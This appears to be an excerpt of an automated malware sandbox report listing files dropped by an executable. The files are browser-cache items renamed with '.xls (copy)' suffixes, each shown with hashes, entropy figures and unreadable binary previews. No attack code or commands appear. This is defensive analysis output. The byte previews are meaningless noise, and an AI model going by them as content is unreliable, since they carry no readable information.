                                                                                                                                                      Preview: ........c.i*Ta...M"...0{O.&.9.7..e4....s...........<^...Ty{..G2#...I...V[.w.....:.-.S..]1KH.T..$a#[.g...z......`EP8.X....0...`...sr-.Q.....e...cF......Nz.Y:t...`d..)X..lF@.9.`..aHC..C......w..Z.6..8.8.I.......%VeBi....//3...#`..[..z.6.R.la.ku<.I..+..D.....$.PD.9..Y.......B+.:WD..&U.f...=....]C..."...#.4^wQqnR.a.BW.,........N..>d...tv.W.]..'r-..$..#..(rZ/w.!`l..F.....o^#-a.c.#. .Y.U......0.. SnZ{.>K.....!"......I.,Qu.1#...@.?.d.HOzh.... 1.=..f.v*.]>.w.,...,r.?p?...C..3W.........SbC%.t.q.u.H..s_dr..D.G...qS...+.=..j/R.....X.....n..l.....zs8.....z...6?9CB?:j.Z.).....2(..H.......jT.R......DS.......n.../.r.J..)$.S8a.2.7f.V5.am..l.]...~.g:6....@.*.9..tl.'.}...3}....oJ=... .."s....4E......y...........'mk......<...~....".%...%..n7LHI.>.-}.6.u..........+..V...j.cuS.....mU>,....<=..*p.XT......k...G\........-..5..LfU..@.9.d.L.^....F..{X...F..b.....vE..e....~P.Dw...B..O.....L].,.[..aV- .].U.... z.3.?B....m../.....H4......5;..Rh.X.c"ZA.t.g3..s
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\kBH4DSEA84cgV7IKw7_Bwvm2NpI[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):12791
                                                                                                                                                      Entropy (8bit):7.922597631795292
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:i71o5/1ONQfsOTHf+6tb7zg+WpxaS+mkaIzL2k4zj+cq615Te+S4w:a1SwqrHfX3CxomkrzL2k4zjv55iUw
                                                                                                                                                      MD5:09B936FBBA73A4260508C2910B3169C1
                                                                                                                                                      SHA1:3150A9761D634E017D192074729069DFED885EE7
                                                                                                                                                      SHA-256:9EE1342E855C2012098895D61B2A2303D4C97FD9B7D31BDABB9D24DD42BE0D38
                                                                                                                                                      SHA-512:0740D964E665A4523994AADAB571FA828AEB76243F8109E904C458632D808F9F9706459C907271097BA50C27D55D5BC9583415F640767BFED7F2FCAC98255E0D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: $8..._..jlY..^.2..NX....^.-X.`k.I..V...(...q)*.)......"..Vkwa....l.J..}...3G..mpP.S.m.....@.....u.Y..I.%.-...^LH.v-....T..^..{......s.9..[|2X.O!.O.V....s*@.g7.d`E.].tF..r..N....h...9.L.{.Y..4...g0....(.......t1.......N.....G..R>K.U.H.8...lq.....a.^Q..$d.b..._.VDS...2oyi..+..-.1zQ......qi..c5...V.+P..z.u.m.............W..f..../~.#j...v..3.....&d2...G.w..2u.6,jG=.^.D..v.yR.?....I.....}.b...!x].xMW.....O/..Vm.0...]~..e...e*@.}d...#..Rr.......K....^...w..Lyu..O^....o.{.'..J..V..o.....d.gA...........`.Ap.......~...:x....ks.......v..{..g...P.........a.t.}QS..4.<2....2...9._....t..1)0,?x.m....b..,.B.xT..9.-..Ytp..F.L....../..V.l...^=".Ml.........F...f.-f2."@..1.z....-.d..N..).....~.Q.W.}..p...}S.4L..J.............gu.......v.:m.N.y.O.-;..)@H.a..U|M8....[$...\5N......Ic.62#k~.Q.A....[=.......P..V.3.1.........Kfli...!......0C...pA*..'.t.7T".s...-..EaO=X.".S.Q.]D..q...,..p>h..C.pa......,.i..lr..6[.I.Yu.V......oh~.$...0.:u.@...V.em......]{.[T.....
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\main.v2.min[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):71072
                                                                                                                                                      Entropy (8bit):7.366563226583906
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:6C3ephhDv2JeVl2TWd+1K12qpxr9d/A4QYISIvD4zRim18K/or0fJa:6C3eT9GeVl2+cqHr9d/A4QYIZvDoFJ/c
                                                                                                                                                      MD5:DA7E1C0C94DF68695007F3C1869E1BF6
                                                                                                                                                      SHA1:8CDCFAE2ACD980E9F85B2D04CA3333B408891D14
                                                                                                                                                      SHA-256:54812F30E87537BA2D48CC3E14C26ABE4EF9BF067B675AB1E615381E944949A4
                                                                                                                                                      SHA-512:07514C131995200EB1381C0D2473D1E7B513FD24EB087108B3E4062102DA49F1FC2FF8B3EDFF6DC97FDD8F6269D10245CF0D3965CABA8EC103151F7DF887C9E5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....q....9_..7.K^......:..'i.j.0 8/3.V.l.M.....|-pE.F.Z..y9.....c..(....N.y8YM%..g.j.Pld..T.+..}.jK....p/...#.U.t..!........D.y.j.M...;6.Vo.7..t$..).Z.PS./2m.^c....p.H...f..cJ....d...`...6.etrrz(...X.S(....?{..Z ....#..V.(.;..q.6. .s....p.C.z....%..}\.......#o..m{4..@..eD.....w.iG..\g|..'bj..&Oq..H./.Q....;.O.Dln(~.V......T...4..N...=..^....M....r...`........<..E?me[....$......w..S?..Z.O.._.C..h@....../..L..,.......Am.k... ...-).............e'R.....v.+..~,..._T#.1..).*p.....9^.*t.W2.|?....D.<.9.hV.\G.)c[].I..z.,.....5'..w......J.....?.V......ly.Y.7......R.7..(...5L2.E..._6..,|..!7..a.E.tW...!.2.;.j.DIM..).F.m+...A[...04..Pb0.cv8...U{...o.....r..........N:&...@-..**...N@|..?sOWlZ..v.L.$a...I.!...w. ......................P.w..Z0]b..`..L./..z ......{).3....>...(...$...%j..<.._..5u...4_..q.....4.N...%...~.D.#.x...?.M.h.=...,.2..[')g.7D..^G.K...hJF...1....o...#].T."...........$zw.WCqIu...b6......sa*.t...;@....A..#.?IQ@....3.1..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\main.v3.min[1].css.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):140616
                                                                                                                                                      Entropy (8bit):7.272895920309411
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:tbIxDn+78X+U4GZ+MV4tMd6Ll0sRslr6YY1llN2hDtsbBZ/HP1e6yWN1eqH3F5Fk:tbUDjCjBdNe6l7ew3FLF/nbDtU
                                                                                                                                                      MD5:3E97215AB9ABEC017F1340FD5A97A0F2
                                                                                                                                                      SHA1:83C720F2CD2FBA6CA13BB6AAAA7ED4FE8B8DAC52
                                                                                                                                                      SHA-256:19730DA95DECAF29DF0E84BA632376EEC6D2114CE6FB74525AAE8CCDB1D922B9
                                                                                                                                                      SHA-512:2EA8E1DA5643122B76942A4439D35D5D54DF576540E6B16F584635C243FF9726FBF4FE8908A952BC69E8933F2A8313E6C87DE4DC1FAA01BDEE8141A537F76CB7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .^...|g.57$F._.6...J.t?......J.y|....t.V.ec..2..9...H..y..X<n`.....DF5.=.o.&Yp{..].....$s?C...T..!US.q..m..2.D..r]...7F...9...i.:%..'.....}G.m.[..K..(.C...T.........Pm..H.q>...W.Y.OW-...J..qc.!J.[.F....|...v..USz.|...............=y.~LwZ.0.......8`.NI.@(V..hJ.p(.W..C;VS.V.d..m.,.t.z.......)r.%....?E..w..f.7U^A.I{.Oav..G.,.....t_...o.U..P...6....=...Da.../.Q.Z9{E..y......-0.^.X...o............]..dX......E!.V...g...S.......U.6CF.h....@..R.........ZJ....t.%.61...b~^.R6...8....yE].(..B../;.b..Q.f.....\..S...q...8.&.KV;%.....]./*<..V.c.bc>.%|S...T....R.Z..4...:.B...H....%.[b@;e....7...hK.....y.B......2E..ku>..._b..n.7.Y.....V...$..VM.^T\....F.H.5.k`5.uc'....A.....~..S..80...Zg..".$..baR8.....z.m*C..../=.......G...G........5. 5.#.IR...or^.{.\iK.MU1u.".....&;y4...^O....QS.m.]B)..:(......^..U....7.........D.W.. I...O..-..O.X.Jd~L.%.....).O.M.r....,....o.O..{fz..SG9.....p..\..N..6...P.)*......z.Q...`6.`.......:/...T..".o..Bg..E].@...4...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\mwf-main.min[1].css.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):826944
                                                                                                                                                      Entropy (8bit):7.211013443682541
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:jDlwLnKIJiiigqQvfo8VNinD6cl3w7PAyE:jDeLJidaH0lg74yE
                                                                                                                                                      MD5:653CAC8F7822F2F4754E8DCE66599478
                                                                                                                                                      SHA1:8998F94AB5B6FA284E5D459E5DB841500C4F6E14
                                                                                                                                                      SHA-256:42632496464EC1785A444C7E1778AC8816AE3B600A6F98A7824511376E2D3AE3
                                                                                                                                                      SHA-512:229119A53BA4004D4F99A3C1B0C2971F311795D10365CDD23F158D00D98EDA9B1F1BC806033D5A058169BE6C050F0D52A456B306C8E14B0D91455DE436C3DF0B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: q..yF.. ...n..U.m....J..!.9N...^.S>..K......fi.u...`._..Vh..?c..j.(....i.....vb..k,?...h&..z..u.3..i...l.....+....._....U.U....z`.......0.l..V.c.IJDA...nL.T.=.?.....<..Z..&m.b.....>.*...4....K..-...F4.....z_...$.HDb.`.G-..p..5!=.)*Zi....i.~^&..#...o.4[.0....... ...K.a.C.%...m.....o/h<?_.Z]..CdG.bX....K......P5..T.\..O...........d/H3X..).qN1....l........X.4..< ..g.E1...6.=...Nx^.:T.,.=...c..m/......p$P.).G.Z.`z|A......Ir.{S'.....C...M.5..6*...'...*G...x.L.)...n,3.w.Q....(..."th.p..*.0!........u.Ey..d...7..^.d..2..GC.^xU->*lzU..C..ph+...Vr..P....d...?B....C.......H0-.."....t...[.9.....6...g..3.w....ROS^KI...I..l..d..u^'*...T....NK".......Ri,.,J.Z.M?.....~k...:..@Mlip..W6....X.X......*r......^|....p.j.).....X2.l.(.k.y5.N2{...........m...........p.!]:...J(.tW,..X..S\.6tn...Z..)...Fo.[O*._.CPw.!.g:..............!k.....#.M..Zo........Zy.;.aT..4...+,{&.L.!&...|..*..&Y.h%.aZT.h....d...g.n........b.....X/.+bJ+.oN..N.....'1...}ts..d...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\mwfmdl2-v3.07[1].woff.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):23328
                                                                                                                                                      Entropy (8bit):7.9763116214029575
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:STQ2NjvQXB00AYNGNzzNUn88grMyTUB3kKHQWKffRt/OODsQriruxEctcxvYZbp:ST7NKxAgGNzRUnMhUZvJ8rDs8iruOyII
                                                                                                                                                      MD5:6D51737BE68FA7E2FB51434D5E46DD3E
                                                                                                                                                      SHA1:E81B541AC49E5385ACBE02A9FED6C4704F21B9B1
                                                                                                                                                      SHA-256:AC5C1CE8B6B474710614FC6FCBABD609301C0BA180D51926A7E27DBC353D3EE7
                                                                                                                                                      SHA-512:8954A2911771F79513F069FD0DFD36D96CA28255CD6E342428E940763B77AEC779BD4CBC5857F2AA8E0B6F7F1F933CC71E275A1245461A30BC24F589FA68126E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .s4....#...k.......s..c..9....>H._mM/0.5o#.-....1..-.#N.Qq..r...$...>=..^.Q'........)a..I..3............!......?)..-(....m.5..kF.w..0.vx....fVm.H.RX...[..4.'./........5H.0..%...y}A..f...i....s....k<b.~m+..G..Y~%..5.<..G..r..v.....]=..n,j...N.{.:H.\....T.S.<.....&..{.L...... Q..w.G#y`.f...)c..Q.0..nCd.0.e......W.#..N.?i..a.EJ...F...?.@).......M....._Jb#.t.....'.vn.8.!......E9...J....s*z...T{.p..A.W{D'&<..-`,..?....&w....Z\.p.......3.....7.........b.zx)]..f.Q5'......-I.87A).\...e.3..4.9.......g..ZYTQ..5......b.#..F...j.,E.R..+.(X"Md.O..,......S..J...Y.7..f.pbq6..!.O.1=.7.w.....|.....V.1..Ts.......!/...l...,..........A2..1;t.N.=..L.8AZ..!..KR0...V.|...~.......i.v9w...ZK...yL...U!Q....(9.v.h..t<....e....,;.U.W%.;.c`...]..g......_.64..p....0.+.<..LX..z]z..X.ewd.+.<G...A.1.,S\.N...r..%[...x.+..U.....Z....4...8.....$.XV)....H..SZ?.{..&.w.r....S_...).....{.....i..K4..!...r....(`2B...6Z.P.,e.:~VI.t-.iJ',..l.lzh......b!YN8..o.......t,qP...@p...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\n1U5gwBiwMo7s-fWOh2kSe3Kils[1].jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13038
                                                                                                                                                      Entropy (8bit):7.92759023015637
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:RapwyDl+lMxl0taqtuSMUpwmjGid60E5y0ybWK6i:4yyUz+GwGG5ny1
                                                                                                                                                      MD5:13EE11FC29CDCE2510A6BE9E8453777E
                                                                                                                                                      SHA1:651FB819B7276E2CC04233050EC8BBABBA6F9B01
                                                                                                                                                      SHA-256:17D4BDB823238F75A5B10B550DCAE1FF79A6BDC94090DEBD63445F4C54F7204C
                                                                                                                                                      SHA-512:B1FFFDA560B5B867ADCCD25D99F8BCA246916277D8133E05BFAEEA4B3E020FFFBC1EF7F1BB8CC6E1A55867BB0E7A4D777B94195D3A4A7AF4797DFED5654B3C50
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..>^1....>+..>.ie;..d$q...D....p.........i..~ZE.&.L.&.1..Jy'...[(..|O.......C.Bk.B.0..2.B....$...0...9JLV.r.(..|o.gh..B.9'..v\.L...%Z^w..|......;.....y. k...|.W6.\.uB.pa...>~.e..J.go..........z......}h...e..s.y...kMW..>!.I..Go..w!.....u....,...aa.....mM..%M.av....lU|....).....|/9....g..n.t.N&..N."sl..........|N...o..J...I.F..g.N.=`d...mt..gt.:.uqyE..l..ko+53.~x.6.h...C.......{.(.E.2N..p.&..xB7.=.|.+...c..MC~.F.h.?....lc.K4u."..S...).....$.Mc(...<..X..x.....p.?..$6..iD.J..(...;.$.w...c$$5Q.....,@.....s...z.G.. ..Zb.@..W.~._1"1.A..rW...<...(...K....[../...c....jh/x.Z....?.R..x.d..`.p\.w..}.v..v.zp.p..I..{..oW..]-....a.i....=..jI..c._..N.z@..;.....4...hl.g.k".X....Z.....P..C.8.WC..'...U.<..~..8..3+}#V.!.....&`..h|.+..+ZX..G..n*......f.?..,D.T....:{......c0.....&...9..qO"...a.....j.......l?G_D..."..}o;...3..<..ai`....8.tT..`[....1b:_`].G..9..VQ.al.... ...G...M..<.L.....&Q;.A......$.....e.x#..$B...b,..O0.)D.CF..s.6....~n..=......CE...... .H...
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\nrrV18753[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98981
                                                                                                                                                      Entropy (8bit):7.314304054128163
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lwtW39/ePhg6YVA7UFeOBehk6M5uCsIO1Jr3M62WS3eTwqeZouYJWqESRkKwMw:9tghF3UFch0uCsIO1keTwqyHVQS
                                                                                                                                                      MD5:A8AA9EC50E264BA009AD0EFDE2D6D47D
                                                                                                                                                      SHA1:D1D29100642DCA69C4F6B6D7A0E1E93328008D92
                                                                                                                                                      SHA-256:F0FB2F59A8D094A33A786975051FCAABB25D4BC9823DF977F9E669726CE4B860
                                                                                                                                                      SHA-512:131337D8BBB5CAC9D346B2152201242CA1058A5CA872756D750982B997D21B5536D91310D6B0BC27A8F16C453EBA590DD83110B7A76941A8A55492342791025B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 3./l..Ii....L....T...V7.o...N.....?=....g3u.oQ...c..y...|x.o....%U!.PP33*>j.......gv.$.K.........6........Pg...H.s.oH.x.%Y...& p....+A_M.....w&kj.c.?..hS.?....7^9..Y.)J.t(.P;...A.......)M-.z..p.O..%.1.P7....'O.sk.0R.qr.U.a8..w......c.T..}..( ...+j.....@...w..d]..J4.vn.D_..zKr.rk.w....q.X.i-..75...?.$5.b...#....M.........".c.0..o..xq.u.oy.|....Ddmz.........K..T.G8....y..LT........T...q............]R.R.6.......k.h..S....Q.?..9l..v..cC./..p.H..VqP1.J.w9.f....5F....6.H..,........g"d.X..Z..4....8v!.@*R,.6....]......y.s}.$#.._?.3.{A.......kxW]/.....,.!}..*|D...(..jI%L...).`E$..~.....n..zp........qcs.Z....... h?`....@'....;...H1&.....a..'i@.....^.a.@...0x...~T....s....Q.Xr.....|.r.....c.)p..DM....q..^T&S..3|...p........,.,..'...a.{.]...e.5^=Y*6up...n.JT..F.....*.OX.7.B...e.G...l.6).F.].b2~.J..iS...QG....g"X...xB.....Y$@.w..1.-.!g|#..2Sy._9..P.W...m.hz]|...:Y..wM.K..svxz.u..O.*H.3.u>...6-U.....P...e_-.A...;.Z-.W=%...........&.\..Ql..X...k.....X.?>s{.5.N...E.a
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\otBannerSdk[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):332992
                                                                                                                                                      Entropy (8bit):7.260741933533543
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:ASuHxRJ6Z8jLZMF0xf0r0wFHpHOucd3Y05TLKg9u:AZvJZxfQ0wPDclL/u
                                                                                                                                                      MD5:AAA11796655BEBAC5D797D970B7FB90C
                                                                                                                                                      SHA1:1A6FA4395F95871FF022B844F492AEAF6E289A44
                                                                                                                                                      SHA-256:6435159C520BBFFF03FF5EA4E114ACEECBDA20806C919E209E2068BEA97E36A5
                                                                                                                                                      SHA-512:F36E6858A9157A1E45F4A6474903B12589D1DAD28F68560EB4C45112A2DF5595351EAD6F4371EB016A7C06FC87010353A6E3AA15951B863FAA992790E29751F1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: c.2t...G|...D..9.........8Vp..D>.......g...~...;.%,..... ...........DA...zX.m...|O`k.b..g.....A{.......D=+./...p..x$...SLd..F..P..aA..k.U.K_8....57.I@6...K.&....OR*..cs..t.S.&...MO....3$.N.7.+.)8.G8K3.9...$..t....Er..|P...H.........9V..,.0.n.....4.va>^V...'8....l......%.O.}@..#.t.xe.........E.B....S....XY........l_.g...Zf....O.....h..+c...n=v....UI,.)............)5XsJ..$..*w..r..`}..v.\y...... V .=..X.V~ma/N. 6|.{8....T../.S.J_m.M..(.`oA4Y.3.q.u;[,9-W<E..iA:.j.~..4...@a.....I..].G6.|i.6....3..[...1~.|.,.".y............z..Q.0....R...\.0r..b....Y...V(.....V..s#......p....r1l.9BN$.!..[..'.).*.._yQ.^....J...,.e.X..L..R...G....9...6..'...Q.l.i..j...G{0h.... ....... ...V.t..J..X..G...<,.jJg.._....krPjP><.%}..O.vf..+.l.Z.....xT8k`.?.~"...j._!........jg.Cr.......iQ2+..FHz..*8.....x.<..s..c..`..:.K...-e.2H.H...+...S.[.zf.HW..Qc{.).[...`...6.z\WT...I..*.kA(..V...os]+.";.J...kv...S*e.....h...i."._.h..>.(.Z!.K&...#.g..!.o./....a..?r..l..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\override[1].css.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2480
                                                                                                                                                      Entropy (8bit):7.269326305538243
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:0q0XngZPSws6iTE93+4+XsrIypW0omkNmzCwgck38VE:R0XnmPsxv4AsrXpUmkNmzTEUE
                                                                                                                                                      MD5:496D558CD0B393B68D234D760F09CB78
                                                                                                                                                      SHA1:6028269597D1C4E026CE515034ED99F21D59D7CE
                                                                                                                                                      SHA-256:2121B4F394A56F36CFBA5B184825644D7F59947BFA5E6DEB2AC410A98638B6A7
                                                                                                                                                      SHA-512:513091E06FC8761E6F2A0DAB046D417323C74E17A2EDFE40F24E969BCD633762D67DEFD6C3D73DF0FA99442BE70CD2E647BB574C739020AD045415B61FDAA260
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....-..$Mk.....h.g..dN..#L..0'%..V.5...2...?qS#.....C`=Y...(....}eD.E:".....v..^m.Ah...\-.K.J.Z.......?s......z..S.{.B.k..}'J.....+d<..=....-jV...x.........[....r!>...v.t.h...+/.r:=......'%....H~J62.[f.$$;...d.l...'...H.e:....E......_,..u.ic....Bv)\.Ig...........A..{.L.0...* ..]..qW...%s.....I.....H$..n..S_&.4Q.:}Z...J"u5 ..y.*..!k......#..(w...WZ6.. ..N.-..#z....g]t.....x.9..r!$..J..V.au..j."..>.cs8%..W.1.....M.Y..cxX.e....4.+h0.z5M..e..~...C..j^...O.r...'...u..i9.80.ye....!F....[B...:..8r.F...p.(....{X./..J.[...|.}..h........q.y.{.-...SlM.~..30.u.0..A.S..F..@......{OhV.f....3J..!T.,..j..I..R.8....(..^.T.f....X....Ih...|n.Qq...c........w..VZ.6..q.q...d.dE*..e5...|.M.....#/. ...|..T.*..+..'.@.'..qZ....?_.8.E..q o.n..... ".X..iG..l....3........R.t..c.......G.....PJRK=.....5.cVHq.ha.u7C.u...r........!wl....Y...nX.7...Qb.@..Q....]...r...7y&..z(..........hKl....-..yR..H.L.D....E... <.O.73Z.....w.....}....QN..P.>g.lK..6.t....qf.p.].y..F.>.....2..wa`..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\qNpEAsGCLUb2B0s0naI1CmTvm1o.gz[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.400610391905305
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:gP9yLGNLLpjYKRN8wpsUtzK8sevWAVgKTaCB7RZ0cHYIgtyUz4BK:gPQOLN8fCzCwgck384
                                                                                                                                                      MD5:5DC12393AFECE51E383219ED2D573D0A
                                                                                                                                                      SHA1:79BAC4AB0FB238F3C6BDDCDEFDA1166DA1D16337
                                                                                                                                                      SHA-256:E8F8F2878AD06FD18CC4D936638A711647EB66CA3CAF79AF0060BD80070434CC
                                                                                                                                                      SHA-512:16FE97B020A12CA10167EE130891973154747918159C2F4C31BDDB6E1D0788F9AC1B603F59F97B864CA2866066FAE85D21AB3B44FF5C3A3B74CF868DB02476C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..\.E......\....A.E....Q.../...E.\...._.3.....U&.....,.....Zn8p.%..k.._.....N6#....:qI....Q#W}X@7../...a....P.g......5...!.{....e..^A.Q.<y..s...........).<J..3*.V..T`+r.......6:C`.k...).'p6.Rv.X.{....-..._.I..0L. I..Qd?......^.<.A^"6..1k..&.,.NA!........A+....I..8..&g....}.[r..hu9Zai)...9{.Z..=.iBwK..Hg....PW......:`R.9@.../.N..^....u<\,...4.QHb..F.1Op.PF.Xb..k...^...XTD`..a...'..f.vjRu..b.,..rJ.....1..7..[./c.........<.....r.....`......{y.%+....#.g'...p...-.....q.@t..../...n(@....^|5Q0=q.`0.....U||.).......?.b.D.<R.#=z..n*AW Im&a12.F.+2|....R_b.d...,.!'.........D..h.....H.....y.Q........}..l......g..m.K..g$ye.1\..v67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\qsml[1].htm.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1424
                                                                                                                                                      Entropy (8bit):6.361306885025647
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:4P85nTIPRhrr7XS7ZnvxOzK8sevWAVgKTaCB7RZ0cHYIgtyUzovrN1:4UJYRhrrOJOzCwgck38FDN1
                                                                                                                                                      MD5:60C3A1154D7C1E3EEB1FD25CBFB3E64E
                                                                                                                                                      SHA1:2559EFF9167AC86E799CBA551393EEDA3538A59F
                                                                                                                                                      SHA-256:37202877DB1004C01205B953E3490EBECEC895001C5BED5AA7066C072F9763C2
                                                                                                                                                      SHA-512:9B2A3C9899D3D3ECC610144CCA62E5A3FD2B987378A726AB66C25A9192BB3B814A12BC911C71E964E0600B5D1497144C62A5F9AC8EA0DF5A3E64DE4A0D1ADF95
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: $..%P...wl......O...;R..E........|.....K.....(.'}..w.......Y-/.c.^.....}.Co.uy..33.l..Y...LB6$..1t.!r'....|.;T.{P.T.G.%I.Ve1AA.W.=.a.+.\..N.TP.....s...9...v.L..v>!B.. b<..........)6N..?...r.P..`R.m.\.,.V..0"kLu.z..M.....r3.7/.....&..6....K....Z.N...-c.</..HI.M.c...Iex.0w3.S...(Z..k...}.Xv.vUh..9.E.....3~U9..>.w..A.G..[...T.|!...{...%..Y.S.fmMf.e7.0..H.uP.C;....3.q.z.............y..._;..%.....Bn.%..z...&ZE...H"O../L..(f...iY..v..q.e2...f....B:...I0..V.._..,.|.mN.2..!......)..uT.jH....1.P....r=..l...M......h.*.x-....4.............W.......E2..?!..<<..?s[.D....b... .EG...A.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\qtrWr26X2qDu6oNpJ0ZLPBT4EsA.gz[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.984647723809662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:hKXjUjISdnRDF/3kAg2v0hlzK8sevWAVgKTaCB7RZ0cHYIgtyUzZ:CjUjIuRDF/k/lzCwgck38Y
                                                                                                                                                      MD5:E1236EC3C282C0FBEEA1C7256C480F9E
                                                                                                                                                      SHA1:F59722CD03CD63F75A6464653A1920AB725FE346
                                                                                                                                                      SHA-256:C2C43775902865FBBA2DF4033AEF00161415D9C6F5CAD03B63ACEA920B34C014
                                                                                                                                                      SHA-512:FCAA4A7C023F2FC7D9777CE2B93478E11EBB8DD6B15829C08025A57F665C35F4513527F9B698D65C23877E441D5C16F20854A0EC16AF0E66E4AF97233B2DA3F1
                                                                                                                                                      Malicious:false
